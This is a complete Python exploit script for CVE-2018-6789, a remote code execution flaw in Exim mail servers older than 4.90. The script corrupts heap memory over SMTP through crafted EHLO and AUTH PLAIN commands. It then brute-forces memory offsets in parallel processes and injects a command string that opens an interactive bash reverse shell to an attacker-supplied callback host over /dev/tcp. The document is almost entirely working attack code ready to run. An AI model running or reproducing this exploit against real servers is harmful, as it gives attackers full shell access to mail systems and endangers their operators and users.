Exim 4.90 Remote Code Execution

`# Exploit Title: exim 4.90 - Remote Code Execution  
# Date: 2018-10-24  
# Exploit Author: hackk.gr  
# Vendor Homepage: exim.org  
# Version: exim < 4.90  
# Tested on: debian exim 4.89, ubuntu exim 4.86_2  
# CVE : CVE-2018-6789  
  
#!/usr/bin/python  
#debian exim 4.89  
#ubuntu exim 4.86_2  
import time  
import socket  
import struct  
import os  
import os.path  
import sys  
import ssl  
import random  
from multiprocessing import Process, Queue  
  
s = None  
f = None  
test = True  
rcpt_index_start = 0x120  
bufsize = 8200  
  
def connect(host, port):  
global s  
global f  
s = socket.create_connection((host,port))  
f = s.makefile("rw", bufsize=0)  
  
def p(v):  
return struct.pack("<Q", v)  
  
def readuntil(delim='\n'):  
data = ''  
auth_plain_available = False  
while True:  
  
l = f.readline()  
if l == "":  
return ""  
  
if l.find("PLAIN") > -1:  
auth_plain_available = True   
  
if test:  
if len(l) > 70:  
sys.stdout.write(l[:70] + " ...\n")  
sys.stdout.flush()  
else:  
print l.strip("\r").strip("\n")  
  
data = data + l  
if data.find(delim) > -1:  
return data  
if l == "\n" or l == "":  
return ""  
return data  
  
def write(data):  
f.write(data + "\n")  
def ehlo(v):  
write("EHLO " + v)  
return readuntil('HELP')  
def unrec(v):  
write(v)  
readuntil('command')  
def auth_plain(v):  
encode = v.encode('base64').replace('\n','').replace('=','')  
write("AUTH PLAIN " + encode)  
l = f.readline()  
if test:  
if l.find("not advert") > -1 or l.find("not supported")> -1:  
raise Exception("NO AUTH PLAIN CONFIG")  
print l  
def auth_plain1(v):  
encode = v.encode('base64').replace('\n','').replace('=','')  
write("AUTH PLAIN " + encode)  
l = f.readline()  
if test:  
if l.find("Incorrect") > -1:  
raise Exception("WRONG DRIVER")  
if l.find("not advert") > -1 or l.find("not supported")> -1:  
raise Exception("NO AUTH PLAIN CONFIG")  
print l  
def auth_plain2(v,value):  
encode = v.encode('base64').replace('\n','').replace('=','')  
value = chr(value).encode('base64').replace('\n','').replace('=','')  
write("AUTH PLAIN " + encode[:-1] + value)  
l = f.readline()  
if test:  
if l.find("Incorrect") > -1:  
raise Exception("WRONG DRIVER")  
if l.find("not advert") > -1 or l.find("not supported")> -1:  
raise Exception("NO AUTH PLAIN CONFIG")  
print l  
def one_byte_overwrite():  
v = "C" * bufsize  
encode = v.encode('base64').replace('\n','').replace('=','')  
encode = encode[:-1] + "PE"  
write("AUTH PLAIN " + encode)  
l = f.readline()  
if test:  
if l.find("Incorrect") > -1:  
raise Exception("WRONG DRIVER")  
if l.find("not advert") > -1 or l.find("not supported")> -1:  
raise Exception("NO AUTH PLAIN CONFIG")  
print l  
  
lookup_table = {0x00: [0,3],  
0x01: [0,7],  
0x02: [0,11],  
0x03: [0,15],  
0x04: [0,19],  
0x05: [0,23],  
0x06: [0,27],  
0x07: [0,31],  
0x08: [0,35],  
0x09: [0,39],  
0x0a: [0,43],  
0x0b: [0,47],  
0x0c: [0,51],  
0x0d: [0,55],  
0x0e: [0,59],  
0x0f: [0,63],  
0x10: [0,67],  
0x11: [0,71],  
0x12: [0,75],  
0x13: [0,79],  
0x14: [0,83],  
0x15: [0,87],  
0x16: [0,91],  
0x17: [0,95],  
0x18: [0,99],  
0x19: [0,103],  
0x1a: [0,107],  
0x1b: [0,111],  
0x1c: [0,115],  
0x1d: [0,119],  
0x1e: [0,123],  
0x1f: [0,127],  
0x20: [0,131],  
0x21: [0,135],  
0x22: [0,139],  
0x23: [0,143],  
0x24: [0,147],  
0x25: [0,151],  
0x26: [0,155],  
0x27: [0,159],  
0x28: [0,163],  
0x29: [0,167],  
0x2a: [0,171],  
0x2b: [0,175],  
0x2c: [0,179],  
0x2d: [0,183],  
0x2e: [0,187],  
0x2f: [0,191],  
0x30: [0,195],  
0x31: [0,199],  
0x32: [0,203],  
0x33: [0,207],  
0x34: [0,211],  
0x35: [0,215],  
0x36: [0,219],  
0x37: [0,223],  
0x38: [0,227],  
0x39: [0,231],  
0x3a: [0,235],  
0x3b: [0,239],  
0x3c: [0,243],  
0x3d: [0,247],  
0x3e: [0,251],  
0x3f: [0,254],  
0x40: [64,3],  
0x41: [64,7],  
0x42: [64,11],  
0x43: [64,15],  
0x44: [64,19],  
0x45: [64,23],  
0x46: [64,27],  
0x47: [64,31],  
0x48: [64,35],  
0x49: [64,39],  
0x4a: [64,43],  
0x4b: [64,47],  
0x4c: [64,51],  
0x4d: [64,55],  
0x4e: [64,59],  
0x4f: [64,63],  
0x50: [64,67],  
0x51: [64,71],  
0x52: [64,75],  
0x53: [64,79],  
0x54: [64,83],  
0x55: [64,87],  
0x56: [64,91],  
0x57: [64,95],  
0x58: [64,99],  
0x59: [64,103],  
0x5a: [64,107],  
0x5b: [64,111],  
0x5c: [64,115],  
0x5d: [64,119],  
0x5e: [64,123],  
0x5f: [64,127],  
0x60: [64,131],  
0x61: [64,135],  
0x62: [64,139],  
0x63: [64,143],  
0x64: [64,147],  
0x65: [64,151],  
0x66: [64,155],  
0x67: [64,159],  
0x68: [64,163],  
0x69: [64,167],  
0x6a: [64,171],  
0x6b: [64,175],  
0x6c: [64,179],  
0x6d: [64,183],  
0x6e: [64,187],  
0x6f: [64,191],  
0x70: [64,195],  
0x71: [64,199],  
0x72: [64,203],  
0x73: [64,207],  
0x74: [64,211],  
0x75: [64,215],  
0x76: [64,219],  
0x77: [64,223],  
0x78: [64,227],  
0x79: [64,231],  
0x7a: [64,235],  
0x7b: [64,239],  
0x7c: [64,243],  
0x7d: [64,247],  
0x7e: [64,251],  
0x7f: [64,254],  
0x80: [128,3],  
0x81: [128,7],  
0x82: [128,11],  
0x83: [128,15],  
0x84: [128,19],  
0x85: [128,23],  
0x86: [128,27],  
0x87: [128,31],  
0x88: [128,35],  
0x89: [128,39],  
0x8a: [128,43],  
0x8b: [128,47],  
0x8c: [128,51],  
0x8d: [128,55],  
0x8e: [128,59],  
0x8f: [128,63],  
0x90: [128,67],  
0x91: [128,71],  
0x92: [128,75],  
0x93: [128,79],  
0x94: [128,83],  
0x95: [128,87],  
0x96: [128,91],  
0x97: [128,95],  
0x98: [128,99],  
0x99: [128,103],  
0x9a: [128,107],  
0x9b: [128,111],  
0x9c: [128,115],  
0x9d: [128,119],  
0x9e: [128,123],  
0x9f: [128,127],  
0xa0: [128,131],  
0xa1: [128,135],  
0xa2: [128,139],  
0xa3: [128,143],  
0xa4: [128,147],  
0xa5: [128,151],  
0xa6: [128,155],  
0xa7: [128,159],  
0xa8: [128,163],  
0xa9: [128,167],  
0xaa: [128,171],  
0xab: [128,175],  
0xac: [128,179],  
0xad: [128,183],  
0xae: [128,187],  
0xaf: [128,191],  
0xb0: [128,195],  
0xb1: [128,199],  
0xb2: [128,203],  
0xb3: [128,207],  
0xb4: [128,211],  
0xb5: [128,215],  
0xb6: [128,219],  
0xb7: [128,223],  
0xb8: [128,227],  
0xb9: [128,231],  
0xba: [128,235],  
0xbb: [128,239],  
0xbc: [128,243],  
0xbd: [128,247],  
0xbe: [128,251],  
0xbf: [128,254],  
0xc0: [192,3],  
0xc1: [192,7],  
0xc2: [192,11],  
0xc3: [192,15],  
0xc4: [192,19],  
0xc5: [192,23],  
0xc6: [192,27],  
0xc7: [192,31],  
0xc8: [192,35],  
0xc9: [192,39],  
0xca: [192,43],  
0xcb: [192,47],  
0xcc: [192,51],  
0xcd: [192,55],  
0xce: [192,59],  
0xcf: [192,63],  
0xd0: [192,67],  
0xd1: [192,71],  
0xd2: [192,75],  
0xd3: [192,79],  
0xd4: [192,83],  
0xd5: [192,87],  
0xd6: [192,91],  
0xd7: [192,95],  
0xd8: [192,99],  
0xd9: [192,103],  
0xda: [192,107],  
0xdb: [192,111],  
0xdc: [192,115],  
0xdd: [192,119],  
0xde: [192,123],  
0xdf: [192,127],  
0xe0: [192,131],  
0xe1: [192,135],  
0xe2: [192,139],  
0xe3: [192,143],  
0xe4: [192,147],  
0xe5: [192,151],  
0xe6: [192,155],  
0xe7: [192,159],  
0xe8: [192,163],  
0xe9: [192,167],  
0xea: [192,171],  
0xeb: [192,175],  
0xec: [192,179],  
0xed: [192,183],  
0xee: [192,187],  
0xef: [192,191],  
0xf0: [192,195],  
0xf1: [192,199],  
0xf2: [192,203],  
0xf3: [192,207],  
0xf4: [192,211],  
0xf5: [192,215],  
0xf6: [192,219],  
0xf7: [192,223],  
0xf8: [192,227],  
0xf9: [192,231],  
0xfa: [192,235],  
0xfb: [192,239],  
0xfc: [192,243],  
0xfd: [192,247],  
0xfe: [192,251],  
0xff: [192,254],  
}   
  
def exploit(b1, b2, b3, rcpt_index, target, cb, cbport):  
global s  
global f  
  
#if c % 0x50 == 0:  
# print " byte1=0x%02x byte2=0x%02x byte3=0x%02x rcpt_index=0x%02x" % (b1, b2, b3, rcpt_index)  
  
try:  
connect(target, 25)  
except:  
raise Exception("CONNECTION ERROR")  
  
banner = f.readline()  
if test:  
print banner.strip("\r").strip("\n")  
  
ehlo("A" * 8000)  
  
ehlo("B" * 16)  
  
unrec("\xff" * 2000)  
ehlo("D" * bufsize)  
one_byte_overwrite()  
  
fake_header = p(0)   
fake_header += p(0x1f51)  
res = auth_plain1("E" * 176 + fake_header + "E" * (bufsize-176-len(fake_header)))  
  
res = ehlo("F" * 16)  
if res == "":  
raise Exception("CRASHED")  
  
unrec("\xff" * 2000)  
unrec("\xff" * 2000)  
  
fake_header = p(0x4110)  
fake_header += p(0x1f50)  
auth_plain("G" * 176 + fake_header + "G" * (bufsize-176-len(fake_header)))  
  
auth_plain2('A'* (bufsize) + p(0x2021) + chr(b1) + chr(b2) + chr(lookup_table[b3][0]), lookup_table[b3][1])  
res = ehlo("I" * 16)  
  
if res == "":  
s.close()  
f.close()  
raise Exception("EHLO(I)")  
  
acl_smtp_rcpt_offset = rcpt_index  
local_host = cb  
local_port = cbport  
cmd = "/usr/bin/setsid /bin/bash -c \"/bin/bash --rcfile <(echo 'echo " + "0x%02x " % b1 + "0x%02x " % b2 + "0x%02x " % b3 + "0x%04x " % rcpt_index + "') -i >& /dev/tcp/" + local_host + "/" + str(local_port) + " 0>&1\""  
cmd_expansion_string = "${run{" + cmd + "}}\0"  
  
auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "\x00")# * (bufsize - acl_smtp_rcpt_offset - len(cmd_expansion_string)))   
  
write("MAIL FROM:<postmaster@localhost>")  
  
res = f.readline()  
  
if res != "":  
if test:  
raise Exception("NO TARGET")  
raise Exception("OFFSET")  
  
raise Exception("BYTE")  
  
write("RCPT TO:<postmaster@localhost>")   
readuntil("Accepted")  
  
write("RCPT TO:<postmaster@localhost>")  
if f.readline() == "":  
s.close()  
f.close()  
raise Exception("RCPT TO")  
  
def checkvuln(host):  
try:  
exploit(0xff, 0xff, 0xff, rcpt_index_start, host, "127.0.0.1", "1337")  
except Exception as e:  
print e  
if str(e) == "EHLO(I)":  
return True  
return False  
  
def _exploit(b1, b2, b3, rcpt_index, target, cb, cbport, q):  
if b1 > 0xff or b2 > 0xff or b3 > 0xff:  
q.put([b1,b2,b3,"VALUE"])  
return  
try:  
exploit(b1, b2, b3, rcpt_index, target, cb, cbport)  
except Exception as e:  
e = str(e)  
if e == "[Errno 104] Connection reset by peer" or e.find("EOF occurred") > -1:  
e = "BYTE"  
q.put([b1,b2,b3,e])  
  
if __name__ == '__main__':  
if len(sys.argv) < 4:  
print "%s <cb> <cbport> <target>" % sys.argv[0]  
sys.exit(1)  
  
target = sys.argv[3]  
cb = sys.argv[1]  
cbport = sys.argv[2]  
  
if len(sys.argv) == 8:  
print "reuse fixed offsets"  
b1 = int(sys.argv[4], 16)  
b2 = int(sys.argv[5], 16)  
b3 = int(sys.argv[6], 16)  
rcpt_index = int(sys.argv[7], 16)  
  
try:  
exploit(b1, b2, b3, rcpt_index, target, cb, cbport)  
except Exception as e:  
print e  
sys.exit(1)  
  
print "check vuln"  
if not checkvuln(target):  
print "false"  
sys.exit(1)  
  
print "true"  
test=False  
  
allbytes = [offset for offset in xrange(0, 0x110)]  
allbytes_10 = [offset for offset in xrange(0x10, 0x110, 0x10)]  
b3_survived = []  
  
b3_survived_stop = False  
tested = []  
try:  
q = Queue()  
procs = []  
print  
print "Discover first byte in offset"  
print  
sys.stdout.write("Try Offsets %02x%02x%02x to %02x%02x%02x ..." % (0x00,0xff,0xff,0xff,0xff,0xff))  
for b3 in allbytes:  
if b3 % 0x10 == 0 and b3 <= 0xff:  
sys.stdout.write("\rTry Offsets %02x%02x%02x to %02x%02x%02x ..." % (b3,0xff,0xff,0xff,0xff,0xff))  
  
b1 = 0x00  
  
for b2 in allbytes_10:  
proc = Process(target=_exploit, args=(b1, b2, b3, rcpt_index_start, target, cb, cbport, q))  
procs.append(proc)  
proc.daemon = True  
proc.start()  
  
to_break = False  
if len(procs) == 16:  
for i in xrange(0,16):  
result = q.get()  
if result[3] == "BYTE":  
if [b3, b2] not in tested:  
tested.append([b3, b2])  
b3_survived.append(result[2])  
sys.stdout.write("\nOffset %02x%02x%02x Survived ..." % (result[2],result[1],result[0]))  
else:  
to_break = True  
  
procs[:] = []  
if to_break:  
break  
  
print "\n"  
print "Discover offsets for rcpt index brute force ..."  
print  
b1_survived = {}  
for b3 in b3_survived:  
for b2 in allbytes:  
if b2 % 0x10 == 0 and b2 <= 0xff:  
sys.stdout.write("\r\r\nTry Offsets %02x%02x%02x to %02x%02x%02x ... " % (b3,b2,0x00,b3,0xff,0xf0))  
for b1 in allbytes_10:  
proc = Process(target=_exploit, args=(b1, b2, b3, rcpt_index_start, target, cb, cbport, q))  
procs.append(proc)  
proc.daemon = True  
proc.start()  
  
if len(procs) == 16:  
for i in xrange(0,16):  
result = q.get()  
if result[3] == "OFFSET":  
if result[2] not in b1_survived:  
b1_survived[result[2]] = []  
b1_survived[result[2]].append(result)  
sys.stdout.write("\n%02x%02x%02x Survived ..." % (result[2],result[1],result[0]))  
  
procs[:] = []  
  
iteration_list = [n for n in xrange(0x100,0x1000,0x10)]  
iteration_list2 = [n for n in xrange(0x1000,0x3000,0x100)]  
  
for n in iteration_list2:  
iteration_list.append(n)  
  
b1_survived_priority = []  
b1_survived_additional = []  
  
for key in sorted(b1_survived):  
if len(b1_survived[key]) < 7:  
b1_survived_priority.append(b1_survived[key])  
else:  
b1_survived_additional.append(b1_survived[key])  
  
_b1_survived = []  
for result in b1_survived_priority:  
_b1_survived.append(result)  
for result in b1_survived_additional:  
_b1_survived.append(result)  
  
print "\n"  
print "Start rcpt index brute force ..."  
print  
  
for result in _b1_survived:  
for s in result:  
sys.stdout.write("\rTry Offset %02x%02x%02x with rcpt index from 0x100 to 0x3000 ..." % (s[2],s[1],s[0]))  
for rcpt_index in iteration_list:  
proc = Process(target=_exploit, args=(s[0], s[1], s[2], rcpt_index, target, cb, cbport, q))  
procs.append(proc)  
proc.daemon = True  
proc.start()  
  
if len(procs) == 16:  
for i in xrange(0,16):  
q.get()  
  
procs[:] = []  
except KeyboardInterrupt:  
pass  
  
print "done."  
  
  
`